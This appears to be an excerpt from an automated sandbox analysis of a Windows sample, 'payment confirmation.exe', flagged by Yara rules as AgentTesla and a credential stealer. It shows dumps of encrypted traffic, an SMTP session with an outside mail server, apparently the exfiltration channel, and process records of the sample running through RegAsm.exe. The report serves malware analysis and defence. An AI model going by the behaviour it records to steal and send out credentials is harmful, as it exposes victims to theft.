                                          2021-09-27 15:30:10 UTC204INData Raw: 6e 89 90 ed df d4 37 f7 5c 4a b3 e6 52 ce ed 35 cb 29 51 a7 54 c2 7b ed 68 c6 f6 6b 9a 9f 3a c8 4b 50 fd 3a 5c 31 6d bd d4 0f a8 74 4f 06 70 2d af c6 2a 57 28 e9 cc b0 e7 b2 3c 31 5a 8f 7a 0c 1a 75 a7 8d 91 eb 21 7b ab 97 48 06 c7 3f 26 05 7d f6 f8 ec eb 98 0a c7 46 c1 c9 3c fb 85 4a b9 d8 c1 f0 95 e5 96 d6 c5 7c 86 92 39 de d6 a3 85 5f 0c c2 bb b8 fa b5 18 c1 bb 4d ac 32 01 0c 50 d5 05 d8 8c e3 49 db 14 8e 0e 52 c8 3e dc 60 71 15 c9 0a d0 0c 3d 81 99 39 1a 84 f1 d4 6e 80 87 6c 54 62 5a 9b e3 a2 1f c1 75 09 77 2a 60 21 d0 8c 6c ad a9 7b a4 9f b9 3e cf 35 f2 86 a5 b4 fc 23 cd 4c 64 9f 41 61 da f0 bd 99 7b 84 bf ba 5f 8d 8a b9 a2 13 b1 e4 84 f2 47 1a 22 43 fb 47 33 7f cd f9 93 b5 9d e8 bf c3 03 8a 04 59 7b 20 9b 5a 95 b5 2d 4a c6 4d 80 4a 9f 24 e4 12 87 d2
                                          Data Ascii: n7\JR5)QT{hk:KP:\1mtOp-*W(<1Zzu!{H?&}F<J|9_M2PIR>`q=9nlTbZuw*`!l{>5#LdAa{_G"CG3Y{ Z-JMJ$
                                          2021-09-27 15:30:10 UTC205INData Raw: 04 d8 74 e6 e2 d9 9e bc f7 3c 4b d0 ec 5b 6e 3d 92 d7 77 a0 3a 71 3a 6c 8c c4 52 36 8b 7d d8 7e 7a f4 52 55 67 d5 e2 68 40 ea 1f 99 3e 4b fb 03 08 a7 61 ef 00 e8 75 6e cd 30 6b 1c 51 6d d8 93 81 44 d6 c0 b6 d9 35 5f 2d 0d a5 40 4f 21 53 5b f4 4c c4 d4 43 1f 24 ca 76 72 c2 e8 e7 56 6d 78 9e 87 e7 c8 f5 8d 49 24 22 19 08 91 b1 79 8c a5 90 bc b3 0e a0 da ae fc 56 9e d4 f3 27 2e 79 3d 38 a9 ef 56 e8 81 51 1c 05 42 7b 0e 3a 5b b1 63 1a 4e ac 09 58 a0 1e d1 a9 5a 1a c6 91 bb 69 82 4f 03 32 11 30 43 9f d9 22 41 22 39 6b c5 28 05 3d 76 4d cc 0c f1 b2 74 35 f2 27 a5 24 ed 71 c2 32 a0 52 79 3e 3a 9b b2 d6 09 0a cc 98 81 0a ed aa 90 d9 a9 d4 51 8c ff c4 43 ae 63 e3 9e 87 42 fc b0 fb 1d bd ce 29 16 39 33 9a 73 8e 5e c0 ff 31 1c 31 b7 04 a8 ef 8d ce a1 8d 2f aa 3c b4
                                          Data Ascii: t<K[n=w:q:lR6}~zRUgh@>Kaun0kQmD5_-@O!S[LC$vrVmxI$"yV'.y=8VQB{:[cNXZiO20C"A"9k(=vMt5'$q2Ry>:QCcB)93s^11/<
                                          2021-09-27 15:30:10 UTC207INData Raw: b3 22 3d 89 6d d8 0d ff 3c 20 95 63 c8 ca 65 e8 58 a8 49 9c d5 09 eb b6 2a 0e b6 03 20 50 8f ff c0 df c3 00 da 4f 4a 9f fb 27 e3 f5 50 ef 35 65 94 58 cb 7b fe 68 83 c6 7c 92 84 54 da 4d 47 c8 38 47 5b 4a 9d d2 33 aa 72 64 11 13 0c b9 d5 35 32 1e ef cc bb f8 b4 79 38 5c 89 5c 32 1b 18 91 80 91 ca 25 7c 91 8e 48 18 e0 5a 15 0b 61 e1 e9 f1 ed 98 24 e7 5c eb f4 36 fb 90 3e a5 cf b5 e2 a4 e4 85 c5 a0 76 86 88 12 d8 da bd 85 4e 16 e6 b9 9e f2 a2 1c c5 bd 72 b1 40 32 69 57 f5 1f f2 a8 e8 4f df 12 8f 1d 3e da 38 da 7f 62 06 ed 0a d0 78 13 b1 82 24 1c 84 b8 d2 79 ab 98 71 26 5b 35 86 ef a2 2f c3 1a 38 71 4f 47 21 c5 9f 6c ac 89 67 a5 9e b3 3f bb 76 c8 97 b0 b0 ce 03 c1 7d 73 97 44 70 c6 f6 bd 93 73 89 95 9c 55 9c 96 a4 a3 67 f8 ed b2 f2 6a 52 00 59 eb 14 34 77 cd
                                          Data Ascii: "=m< ceXI* POJ'P5eX{h|TMG8G[J3rd52y8\\2%|HZa$\6>vNr@2iWO>8bx$yq&[5/8qOG!lg?v}sDpsUgjRY4w
                                          2021-09-27 15:30:10 UTC208INData Raw: 46 0d 7a 99 4d 7f 7f 76 32 ab af de 28 35 86 50 27 45 02 e9 d4 4f c6 38 fd df a2 d0 b7 09 b1 7c ed e5 86 ba b8 f3 02 6f cb f7 57 1e 1f e7 d1 7e bd 11 4b 52 62 8e e8 17 00 9b 68 f7 7f 6f ff 21 3a 50 ef df 4f 48 fa 0d 9d 17 4c ec 15 6c a5 76 e8 5f cb 7e 74 d6 27 6f 46 7c 04 c6 93 87 68 a6 e0 aa d8 33 5f 34 11 ed 76 5a 22 42 4c ea 62 f0 d4 54 35 37 c7 74 6a ac c2 f1 7c 48 75 80 a9 f8 e8 ec 98 4f 2e 22 28 2e 97 97 68 9c 94 94 a6 80 19 ab fa aa fc 43 8a b1 c5 01 2e 73 4d 09 94 e9 4d dc 96 4c 3c 01 42 6e 1a 5f 5c b1 65 36 1e 91 16 45 ab 7f ec 91 4d 0b 96 ae b5 7f 9a 28 25 33 1d 2e 55 b3 d4 31 56 01 4b 47 d2 3f 61 12 6b 48 c6 31 e9 ad 43 3f f2 07 b6 39 f0 47 a0 1f a0 45 5d 00 30 90 b8 d6 1d 06 c7 94 b3 1d fc b6 b3 d8 c6 cb 4d f8 e2 ed 36 8e 7a 86 a9 8e 42 fe af
                                          Data Ascii: FzMv2(5P'EO8|oW~KRbho!:POHLlv_~t'oF|h3_4vZ"BLbT57tj|HuO."(.hC.sMML<Bn_\e6EM(%3.U1VKG?akH1C?9GE]0M6zB
                                          2021-09-27 15:30:10 UTC209INData Raw: 35 a5 d8 a4 01 fc 0d 8b e9 27 62 86 1b c2 69 30 24 c3 dd 58 a1 8d 08 32 2c 00 fb e5 c9 2c 4e 71 ee 07 96 79 f5 51 65 e2 3d 85 b4 90 73 3d 28 d7 fd a1 57 b7 c3 4e 45 f6 64 48 3b f3 f7 80 9a b4 42 af 2b 30 d4 91 52 8f 80 5e a4 5e 06 d7 29 f5 16 8b 1c 82 96 7c fb fe 3d 92 20 36 2c 49 3d 49 89 db ae 44 d4 14 a1 7d 62 ff d1 a0 61 32 4e 2d b3 c7 a8 c0 2e d7 2e fe 05 42 7d 99 d0 ec c3 ae 58 16 c1 da 29 68 97 7a 56 6f 0b 97 8d 8e 85 9c 43 83 25 b9 a1 59 8b e9 33 de ae c1 bc fa 86 f2 b1 a1 1f f2 d4 42 96 b3 c1 ee 21 6a e2 c7 a8 85 b9 62 bd dd 47 da 32 46 7b 41 96 6b ac fc 94 5e b4 6b e6 78 4f 9b dc 8d 1b 86 51 b5 6d a7 2c 13 f3 6c 7f 61 84 dd b5 1c 75 c1 0f d5 06 33 f5 8a cb 62 32 50 42 05 4e 13 d4 90 da 88 e3 df 05 d6 e5 d8 4a cf 74 9d ed ca ce 9e 66 a7 21 18 e8
                                          Data Ascii: 5'bi0$X2,,NqyQe=s=(WNEdH;B+0R^^)|= 6,I=ID}ba2N-..B}X)hzVoC%Y3B!jbG2F{Ak^kxOQm,lau3b2PBNJtf!
                                          2021-09-27 15:30:10 UTC210INData Raw: 5d c0 95 c4 bb 7c c6 c8 e3 61 a5 65 80 43 6a e7 0f 46 ad b5 a5 73 cb 33 b4 60 fa 9a 26 b4 cf 9c e8 0c b0 80 fd bc 29 bb 96 97 2d f8 ac ac b2 de ad 48 b0 cf c9 58 14 06 8b 08 93 ac d1 38 37 2e 0a b7 ec 05 3d 34 6c 8d 56 28 0e 0e cb d7 55 cb b2 45 92 ef 02 c7 47 c8 7d 96 0a 31 7c 8e 48 5c cc 97 45 be 31 46 aa ed f5 06 25 c3 e2 f5 06 05 5c 6a ca 3c 2a 06 24 b1 5d 96 01 ec 11 98 91 39 f2 16 02 b7 1e f1 2a ad 02 ed e1 af e6 b8 74 22 ec ca df 93 40 19 c2 fa 4f 7e 08 c0 df 60 36 38 51 79 58 48 4e 73 a0 90 0f 97 e5 20 cf 2f 7f 67 44 a4 10 ed 32 57 bc 2e 0a 04 0d 88 39 b9 af 5c a0 44 3e 9f 58 e4 cc 64 40 2c 7a 66 86 a8 36 03 b4 2e 39 d2 85 d3 24 87 45 b8 da 98 d4 35 a5 0b 9c 9d 1a 85 0c e7 6c 7e 98 20 2a af 40 26 49 89 9a a3 44 d4 04 29 54 73 7f d3 a5 52 33 4f ae
                                          Data Ascii: ]|aeCjFs3`&)-HX87.=4lV(UEG}1|H\E1F%\j<*$]9*t"@O~`68QyXHNs /gD2W.9\D>Xd@,zf6.9$E5l~ *@&ID)TsR3O
                                          2021-09-27 15:30:10 UTC211INData Raw: 0f bc b8 65 ca 8f 0d d7 aa 59 df 6e 31 0c 3d dc 27 9b eb 5b 58 00 23 9d 0a f1 21 bf 64 95 17 67 9a 5c 68 b5 05 c5 4a cf 05 da c1 69 92 68 47 f3 74 63 2e d3 1f 22 99 0b f2 3e 97 81 0f 4d 46 63 8b 7c f7 c9 e9 c5 dc 1e 5c 5c 52 6c f3 c2 35 ee aa 6e cd fc 6d 85 07 ab 7e ac 91 17 d0 96 c8 36 26 4c cd 4b 68 97 51 64 d7 5f 59 03 38 a8 66 b3 6d 96 07 60 d0 af d7 38 c0 2e 6b 06 76 0f c7 dd 4e 55 c5 27 c2 31 e2 ff b8 54 fc e8 16 8f 4d 3e 66 fd f6 e8 90 61 e0 87 46 92 d8 9b 64 19 16 f1 e2 75 49 7b 4d 49 46 ce 93 6f 98 76 37 1f 50 e5 26 16 03 1d 7f c5 d8 a9 cb 98 e7 2a 56 4d 60 8c a1 02 fd 55 9d b1 d2 aa d8 7e ac 15 82 91 dd e4 d7 8d 6d 04 b3 01 63 13 49 9a be 0e c9 79 2f 4e 10 fc bf 5a 79 eb 09 99 0a 15 88 28 52 24 be 8b 2f 3f e2 65 ff 7e 05 98 7e ee 93 14 bc 02 b5
                                          Data Ascii: eYn1='[X#!dg\hJihGtc.">MFc|\\Rl5nm~6&LKhQd_Y8fm`8.kvNU'1TM>faFduI{MIFov7P&*VM`U~mcIy/NZy(R$/?e~~
                                          2021-09-27 15:30:10 UTC212INData Raw: a9 54 16 5f da 3d 1b 7d 59 49 d8 81 41 33 b7 e5 4a 01 7d f5 c4 8c 99 96 a3 cf f0 27 c7 59 c3 85 44 6e 66 c7 4b 2f 63 a0 59 86 51 e9 74 1e 5a ac b1 a7 f3 53 27 b4 60 37 95 36 ba d6 e2 69 ee b1 f9 fd 55 89 d2 d5 ea 38 f8 2a 3d bd d6 ba d4 f1 d0 d5 d4 a3 15 80 06 ef ac d1 00 31 00 06 a4 63 89 aa f7 e6 14 54 27 8a 53 c0 df 42 5b 74 9f 8f e6 09 db 33 df 09 81 7e 26 09 81 24 5c 25 39 3e c5 45 51 c4 ff 9e 1a 51 d4 96 e2 7c 10 33 6d b1 af da 15 43 b6 26 05 f1 ff 76 84 f0 36 95 0c 62 a5 76 f6 51 3e f2 fe 86 b3 0f 2a 36 30 a8 d8 86 81 18 0b 99 e8 15 70 32 ce e4 6e 0e 36 74 10 72 21 65 1a f3 f9 5f fe b4 49 99 46 28 e6 42 b6 3e ff 13 45 a8 3c c1 a5 5b 86 60 a8 63 f9 ef 56 f0 df 19 65 a4 6c 07 3e a8 ff d3 ba e2 43 e4 2e 6f dc cc 52 d4 81 0a aa 3a 01 b7 3b cb 1e ea 1c
                                          Data Ascii: T_=}YIA3J}'YDnfK/cYQtZS'`76iU8*=1cT'SB[t3~&$\%9>EQQ|3mC&v6bvQ>*60p2n6tr!e_IF(B>E<[`cVel>C.oR:;
                                          2021-09-27 15:30:10 UTC214INData Raw: 10 e8 3f 1b bb 8a b5 da 9c a8 d3 f3 32 f1 d4 c3 c1 91 b5 8c d7 85 3b 14 67 22 9b 14 46 11 b1 ae e7 c6 93 8c d2 b7 58 c3 7b 22 01 28 d7 21 92 f0 56 44 8c 36 88 07 fb 23 a9 74 95 14 eb 86 57 7b a9 71 cc 64 c3 19 c7 c9 67 9d 6d 5a ff 69 75 ac da 00 22 b0 11 fc 36 80 09 91 49 49 e7 c1 74 e0 40 78 c2 ce 9d 16 4f 45 e7 ee d0 b3 fa aa 6f d1 e4 fe 47 10 c8 7c b7 9f 04 4c 32 d0 13 3a 59 5e 42 72 a5 d0 e2 48 5a 4d 14 99 80 69 35 6c 85 2b 7a c3 a7 d9 a4 5b 33 64 9b 3e 1c d5 5d c6 d5 ee a8 84 23 8e f0 36 d2 9b ec 04 e1 52 26 7e f0 e8 eb 91 bd ff 95 27 92 d5 9b 7d 07 1f e3 eb 75 5c 75 45 51 4b cc 99 6d 9c 7f 37 03 37 e5 35 10 05 1b 6b cc d5 b1 4c 47 f4 2c 50 4b 6d 91 ae 18 b6 5a 91 a3 c3 25 5c 71 a3 9a c8 84 cb 78 40 82 71 8d e2 9e 20 10 52 9c a2 93 94 77 5b 5a 10 f0
                                          Data Ascii: ?2;g"FX{"(!VD6#tW{qdgmZiu"6IIt@xOEoG|L2:Y^BrHZMi5l+z[3d>]#6R&~'}u\uEQKm775kLG,PKmZ%\qx@q Rw[Z
                                          2021-09-27 15:30:10 UTC215INData Raw: 94 73 4d 69 81 d8 41 71 21 bd ce 7c 9f 4d 52 a8 a7 a6 26 7a a9 95 38 c3 15 97 6f 45 40 b5 db 86 59 cd b2 49 f2 ca 4f c2 09 e7 1d a4 9e c3 81 7b ed 42 ca 83 e2 ae cf fb 21 c5 51 c6 94 c4 a1 67 d3 c1 ab 78 b2 6c 94 c2 f0 e4 01 db ef b1 a7 f3 53 27 b4 60 37 8e 2a 35 43 8f 7c 93 30 da fe 32 87 b2 c0 8b b9 73 2c 20 a1 4a fb ca fa c2 c9 5e 0b 0d 99 06 eb a2 42 20 76 28 19 ab 71 96 34 3b e8 08 45 bb cf 46 cd ca 5a 44 eb 5a 91 f4 12 54 b7 db 01 96 e2 67 16 92 2f 40 ad 90 3e 2d 1c 57 cd f1 92 07 4b d8 99 65 5a 19 27 fb 9e 33 46 09 48 be 31 8c 75 fb 70 80 d8 2e 93 19 6e ad 7f fe 46 b7 63 f8 8c b3 9d d3 13 22 ec de b6 80 3b 72 b6 ed 2e 70 04 dc a8 72 2a b5 06 1e 4d 24 42 1a a0 78 28 ec 74 04 cf 2f 73 e6 02 96 78 fe 49 c6 b0 3a ab a4 0c 94 ac 7d 29 e9 a0 57 a1 df 54
                                          Data Ascii: sMiAq!|MR&z8oE@YIO{B!QgxlS'`7*5C|02s, J^B v(q4;EFZDZTg/@>-WKeZ'3FH1up.nFc";r.pr*M$Bx(t/sxI:})WT
                                          2021-09-27 15:30:10 UTC216INData Raw: 55 f1 b5 75 4b 0e 5e 82 d4 be c8 0b dc 59 07 c6 69 d3 5e 4d 73 84 fe d5 40 35 62 a3 2e 1d fa 37 15 b4 85 ac 48 9f fc dc e7 33 f2 c6 c5 d8 0e e9 0a 73 8e 29 10 73 20 95 08 4f 15 be a2 ef cf 95 8b c7 a6 dc 6a 6f 31 18 a0 7d 2d 95 f7 50 41 86 1e 81 0d e7 30 a5 6c 9a 89 7a 85 51 6e bb 64 df 69 c5 19 d5 dc 66 8e 67 4f f6 66 74 a4 d4 15 24 9f 13 d7 21 9c 80 06 42 5c 60 9d 7c fc dc ef cb d4 14 5f 46 54 79 fa df 35 fd 38 1d e2 f1 68 12 10 20 ed ab 83 97 8d 8b db 2f 28 26 d5 59 69 80 c3 71 8b 4b 57 7f ab 01 cf b8 6c 8e 0a 75 de db c3 38 cc 3a 7e 12 76 0c e7 de 5e cc fe 22 c4 34 eb f5 36 c8 fa f2 04 0c fb 2a 43 f7 e7 e8 93 6c e0 04 db 96 c9 95 77 17 1e e1 eb 65 41 6b 45 59 44 c7 98 6b 90 78 3f 0f 39 eb 28 1e 0b 1d 76 c4 d5 a9 cb f5 e7 2a 4e 4d 78 89 b0 18 82 5a 97
                                          Data Ascii: UuK^Yi^Ms@5b.7H3s)s Ojo1}-PA0lzQndifgOft$!B\`|_FTy58h /(&YiqKWlu8:~v^"46*ClweAkEYDkx?9(v*NMxZ
                                          2021-09-27 15:30:10 UTC217INData Raw: 5c 59 4f 35 56 3b 26 a8 5a 7c 48 1f 38 be 60 97 de 35 5b 91 46 45 6f 8f 1e a2 5a d7 b1 e1 7c 56 c8 c3 d4 5d e3 4c ef 40 bc 82 c8 e5 b7 ac b9 36 ea 20 42 2b c8 08 81 cd f6 48 b1 c4 0c 8f c2 9c 58 72 45 c7 1f 10 62 e4 a7 89 42 1e 72 ed 4f cb 8c fc a9 d0 ec ae f8 50 e0 96 c4 b5 fa 3a d9 ff 7a be 7e 81 56 7b 64 8a 5b bd 24 59 70 c4 28 b4 61 93 89 b8 58 cf 9f e8 24 b0 8c 7d d0 81 a9 c4 18 9d eb 3f b5 5f c4 bf cb f6 dc d5 d6 f2 1d 97 95 1f bf 42 21 da 28 03 a0 70 9d 2f 21 e4 1c 53 1a 8e 47 cc cc 40 4d eb 43 8e 60 75 c8 2b dd 1e 99 66 2b 10 9c 20 53 a0 82 29 ac 59 49 c6 f6 9a 34 4d d0 99 67 83 18 32 7f be 2b 5e 11 5f 22 41 99 6d f9 65 8f f0 2f 9c 06 62 ad 73 c3 42 b6 61 f4 8f b8 85 b7 18 22 04 ad ab 84 21 0e ab e9 3b 75 0c cb f1 6c 39 3c 49 1e 4d 28 41 1f ba eb
                                          Data Ascii: \YO5V;&Z|H8`5[FEoZ|V]L@6 B+HXrEbBrOP:z~V{d[$Yp(aX$}?_B!(p/!SG@MC`u+f+ S)YI4Mg2+^_"Ame/bsBa"!;ul9<IM(A
                                          2021-09-27 15:30:10 UTC219INData Raw: 79 4f 95 40 b4 14 1b 69 a1 78 a7 04 17 e4 ff d2 69 81 df b7 1f 70 e9 18 53 2d 28 f0 98 bf 7a 93 76 57 00 52 04 48 b0 d5 0c c4 dc 04 c9 ee cb 49 c1 7e 88 eb ce c0 9a 63 ad 3e 92 e3 23 91 bc 89 ba cd 10 f7 5a 6e 34 f1 c7 c8 d8 1b ff 89 ca 83 28 1f 7d 43 97 13 44 0f bc b8 63 ca 95 87 dd b4 41 c7 79 ae 18 28 c0 2e 99 eb 5b 57 87 23 85 12 e9 39 a7 7c 82 88 77 9a 5c 7b a2 71 c7 62 df 6d c5 c1 7e 8e 60 5a f4 7c 74 b1 df 00 29 85 11 f0 3e 97 95 0d 55 5e 7b 84 73 73 d1 f3 47 cd 0e 3f 4f 57 61 e2 c7 2d ea a5 e9 d5 f3 62 02 1f a4 21 ad b7 0b c8 8e d0 2e 3f 57 cf d6 74 98 d4 ed ce 5f 57 92 19 93 fb 16 63 0a 0a 61 d0 ae d7 39 de 2e 64 73 6c 88 c7 ce df 28 e0 3b 45 39 fe e8 2a 41 fa f0 97 84 41 3e 66 e9 f4 90 0d e1 ec 9b 53 86 d5 89 69 0b 03 fd f7 67 54 7a c4 fc 49 d3
                                          Data Ascii: yO@ixipS-(zvWRHI~c>#Zn4(}CDcAy(.[W#9|w\{qbm~`Z|t)>U^{ssG?OWa-b!.?Wt_Wca9.dsl(;E9*AA>fSigTzI
                                          2021-09-27 15:30:10 UTC220INData Raw: 30 1a 63 5f 2f d4 11 68 4e e2 79 3d d2 17 a5 c6 a8 69 c6 dc da 07 e3 28 66 5f 74 5e 37 dc b5 42 32 51 39 28 aa c6 61 54 02 24 a3 62 90 de 37 5a 9f 57 c4 56 88 3e a0 59 c5 31 0d 72 5f 78 c1 d6 4f c3 20 fe c0 c5 8c cf e3 aa a9 b3 34 f8 a0 97 36 9d 83 85 ed 1e 43 bb d5 8f 5e c8 bc 5b 73 57 47 66 03 d5 3d a5 8c 14 1c 2b e7 1a cc dd ff ee d2 ac 2f 9e 59 89 94 89 a7 34 d6 96 e2 36 a5 37 86 05 69 aa 13 5a af a4 b5 cf ce c9 58 e1 77 9a 38 b4 da 8e 69 81 b1 9e fd 3c 89 bc d5 99 38 ea 2d 0a b3 cb bf c9 f4 cc c7 52 16 08 85 15 86 be 50 a1 36 20 04 a5 6d 98 28 26 ed 14 57 7e 8f 4e c5 c3 47 1c f6 27 9c 93 00 93 2e b3 14 e8 63 46 15 d5 21 20 a5 e3 2c c3 58 54 c3 ff 9c 30 4c d5 8b e7 6f 43 35 0a a3 4f 43 7a 4d d0 34 e8 68 9f 78 fe f8 42 9b 6b 6b cb 77 e3 43 bf 6b ff 88
                                          Data Ascii: 0c_/hNy=i(f_t^7B2Q9(aT$b7ZWV>Y1r_xO 46C^[sWGf=+/Y467iZXw8i<8-RP6 m(&W~NG'.cF! ,XT0LoC5OCzM4hxBkkwCk
                                          2021-09-27 15:30:10 UTC221INData Raw: 91 b4 c9 e0 3c 78 87 d5 cd 97 d0 6a a0 cf 22 de 32 46 69 24 90 6b ad e1 86 3b ba 60 e1 7c 52 89 5d a8 09 07 74 bd 65 a2 0c 13 e2 ed 56 68 84 df b7 0d f4 e8 1e 54 2f 35 f5 8a d6 70 b3 75 4a 05 4f 01 55 b5 c8 09 ce db 02 d4 eb d6 4c cf 76 80 e3 c4 c0 99 66 a3 2f 16 e6 31 15 b5 82 bd cb 1e e5 db f3 31 f9 da cd d0 13 f8 8a d7 86 35 1a 6f 2a 9f 14 47 12 b9 aa e7 c7 9d 8f da b7 5c c2 6b 2c 09 20 d9 29 95 f6 5e 4a 82 3e 80 0f ec 24 a2 61 87 95 72 87 59 66 a7 6c c2 6a cd 04 c9 c1 7a 93 65 47 f1 61 71 ac da 1d 2c e7 15 f7 2f 92 88 08 08 6d 66 81 61 f2 c1 e1 c3 dc 1c 56 41 57 64 ff c2 30 ef b8 ec c8 f6 7f 07 02 a1 74 aa 91 16 cd 93 d5 33 3a 4b dd 57 74 85 d1 f0 cb 43 45 12 b9 81 7b b6 71 8b 02 7d cc b2 cb 25 c2 32 76 1a 7e 09 c7 dc 5f d4 fc 29 c4 31 e3 ed 38 c0 f2
                                          Data Ascii: <xj"2Fi$k;`|R]teVhT/5puJOULvf/115o*G\k, )^J>$arYfljzeGaq,/mfaVAWd0t3:KWtCE{q}%2v~_)18


                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Sep 27, 2021 17:31:45.913671970 CEST5874979691.197.229.125192.168.11.20220-othello.ldn.kgix.net ESMTP Exim 4.94.2 #2 Mon, 27 Sep 2021 15:31:45 +0000
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          Sep 27, 2021 17:31:45.914150953 CEST49796587192.168.11.2091.197.229.125EHLO 648351
                                          Sep 27, 2021 17:31:45.940546036 CEST5874979691.197.229.125192.168.11.20250-othello.ldn.kgix.net Hello 648351 [84.17.52.54]
                                          250-SIZE 37748736
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPE_CONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          Sep 27, 2021 17:31:45.940906048 CEST49796587192.168.11.2091.197.229.125STARTTLS
                                          Sep 27, 2021 17:31:45.963781118 CEST5874979691.197.229.125192.168.11.20220 TLS go ahead

                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:17:29:22
                                          Start date:27/09/2021
                                          Path:C:\Users\user\Desktop\payment confirmation.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\payment confirmation.exe'
                                          Imagebase:0x400000
                                          File size:90112 bytes
                                          MD5 hash:930DEBCCDEECB4FC138B0319BEF33720
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Visual Basic
                                          Reputation:low

                                          General

                                          Start time:17:29:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\payment confirmation.exe'
                                          Imagebase:0xcd0000
                                          File size:65440 bytes
                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.31008895795.000000001E0F1000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:17:29:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6820d0000
                                          File size:875008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Disassembly

                                          Code Analysis

                                          Reset < >